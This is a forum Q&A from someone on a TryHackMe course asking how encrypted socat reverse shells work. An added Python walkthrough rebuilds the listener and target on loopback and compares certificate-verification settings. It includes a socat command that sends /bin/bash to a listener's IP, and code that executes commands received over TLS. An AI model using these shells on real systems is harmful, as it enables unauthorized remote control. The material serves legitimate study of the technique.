While studying reverse/bind shells on TryHackMe, I encountered a few lines of code whose functions I am struggling to fully understand. Here is the code in question:
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
- generates an RSA private key. What specifies it as being private and not public?
- generates a certificate; however, I thought certificates were mainly used for websites?
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
- socat is opening a listener with OpenSSL instead of TCP, which I assume starts an endpoint of an encrypted channel.
- This listener is using a .pem file that is created with a line of code not included here, which includes the private key and TLS certificate.
- The listener is being set to run with that certificate, while 'verify=0' ensures it is run without checking its authenticity from a CA.
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash
- The target connects to the listener by specifying its IP and port number, while also not checking for the authenticity of a certificate.
What exactly is going on here? Why does the machine connecting to the OpenSSL listener not need to provide a key for an encrypted channel? What is the difference between socat TCP-L and socat OPENSSL-L?
If anyone could help by breaking down some of what's happening it'd be greatly appreciated.
This is the way TLS works, like a browser connecting to a secure HTTPS site. You can always change the verify option to force signature verification methods.
There is a small project which I did about it.
https://aze2201.github.io/shell_sockV2/
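An added, runnable walk-through of the three commands in the question and of the "change the verify option" point in the answer (this is example code written for this page, not code from the original post, from TryHackMe or from the linked project). It runs the same openssl req line to produce shell.key and shell.crt, concatenates them into the shell.pem the question says was left out, and then stands in for the two socat commands with Python's ssl module so the handshake can be inspected: the listener side loads shell.pem, the target side connects with no key of its own and executes whatever arrives over the channel. The same target is then run three times with different trust settings: verify=0, the normal CA trust store (which refuses the self-signed certificate), and a pinned cafile, which is socat's cafile= option. Assumptions: openssl is on PATH, a loopback port can be bound, and the command sent over the channel ("echo hello") is constructed for the demo.

```python
# Added example for this page, not code from the original post or from
# TryHackMe. Assumes `openssl` is on PATH and that a loopback port can be
# bound. The command sent over the channel ("echo hello") is constructed.
import os
import socket
import ssl
import subprocess
import tempfile
import threading

WORK = tempfile.mkdtemp(prefix="shell-tls-")
KEY = os.path.join(WORK, "shell.key")
CRT = os.path.join(WORK, "shell.crt")
PEM = os.path.join(WORK, "shell.pem")


def make_pem():
    """The openssl req line from the question (-subj added so it never
    prompts), followed by the concatenation step the question says was
    left out: socat's cert= reads key and certificate from one PEM file."""
    subprocess.run(["openssl", "req", "-newkey", "rsa:2048", "-nodes",
                    "-keyout", KEY, "-x509", "-days", "362",
                    "-subj", "/CN=shell", "-out", CRT],
                   check=True, capture_output=True)
    with open(PEM, "wb") as out:          # cat shell.key shell.crt > shell.pem
        for path in (KEY, CRT):
            with open(path, "rb") as part:
                out.write(part.read())
    return PEM


def pem_labels(path):
    """BEGIN labels in a PEM file. Nothing in the command says 'private'; the
    file format does: -keyout holds a PRIVATE KEY block, -out a CERTIFICATE
    block that carries the matching public key plus subject and validity."""
    with open(path) as f:
        return [line.strip()[len("-----BEGIN "):-len("-----")]
                for line in f if line.startswith("-----BEGIN ")]


def listener(port_box, ready, seen):
    """Attacker side: socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
    The server proves its identity with shell.pem; verify_mode stays CERT_NONE,
    so it never asks the client for a certificate. Only one side needs a key,
    exactly like a browser talking to an HTTPS site."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(PEM)
    with socket.socket() as raw:
        raw.bind(("127.0.0.1", 0))
        raw.listen(1)
        port_box.append(raw.getsockname()[1])
        ready.set()
        conn, _ = raw.accept()
        try:
            with ctx.wrap_socket(conn, server_side=True) as tls:
                tls.sendall(b"echo hello\n")        # operator types a command
                seen.append(tls.recv(4096).decode().strip())
        except OSError as exc:                     # target rejected our cert
            seen.append("handshake failed: " + type(exc).__name__)
        finally:
            conn.close()


def target(port, ctx):
    """Target side: socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash
    `ctx` decides whether the target checks who is on the other end before
    handing over its shell."""
    with socket.create_connection(("127.0.0.1", port)) as raw:
        with ctx.wrap_socket(raw, server_hostname="127.0.0.1") as tls:
            cmd = tls.recv(4096).decode()
            done = subprocess.run(cmd, shell=True, capture_output=True)
            tls.sendall(done.stdout or done.stderr or b"(no output)\n")


def ctx_verify0():
    """verify=0: encrypted, but any certificate is accepted, so the target
    cannot tell whose listener it has just given a shell to."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def ctx_pinned():
    """socat's cafile=shell.crt: verification stays on (CERT_REQUIRED is the
    client default) and trusts exactly this self-signed certificate. The
    target still carries only the public certificate, never the key."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False             # pin the certificate, not a name
    ctx.load_verify_locations(cafile=CRT)
    return ctx


def run_exchange(ctx):
    """One listener/target pair: (what the listener got back, what the target saw)."""
    port_box, ready, seen = [], threading.Event(), []
    t = threading.Thread(target=listener, args=(port_box, ready, seen))
    t.start()
    ready.wait(5)
    try:
        target(port_box[0], ctx)
        outcome = "connected"
    except ssl.SSLCertVerificationError as exc:
        outcome = "refused: " + exc.verify_message
    t.join(5)
    return (seen[0] if seen else "nothing"), outcome


def demo():
    make_pem()
    return {"key file": pem_labels(KEY),
            "pem file": pem_labels(PEM),
            "verify=0": run_exchange(ctx_verify0()),
            "default trust store": run_exchange(ssl.create_default_context()),
            "pinned cafile": run_exchange(ctx_pinned())}


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:20} {outcome}")
```

The three runs answer the questions directly: the target never supplies a key because TLS only requires the server (the listener) to prove who it is; the client is optional, and verify=0 on the listener merely says it will not ask. verify=0 on the target is the weak spot: the channel is encrypted, but a self-signed certificate is accepted from anyone, so a man-in-the-middle with their own shell.pem gets the shell. The "default trust store" run shows what verification does when switched on against a self-signed certificate (it refuses), and the "pinned cafile" run is the practical middle ground: ship shell.crt (public only) to the target and trust that single certificate, which in socat is the cafile= option alongside verify=1. TCP-L versus OPENSSL-L is the same difference: TCP-LISTEN moves bytes in the clear, OPENSSL-LISTEN wraps the same byte stream in this handshake first.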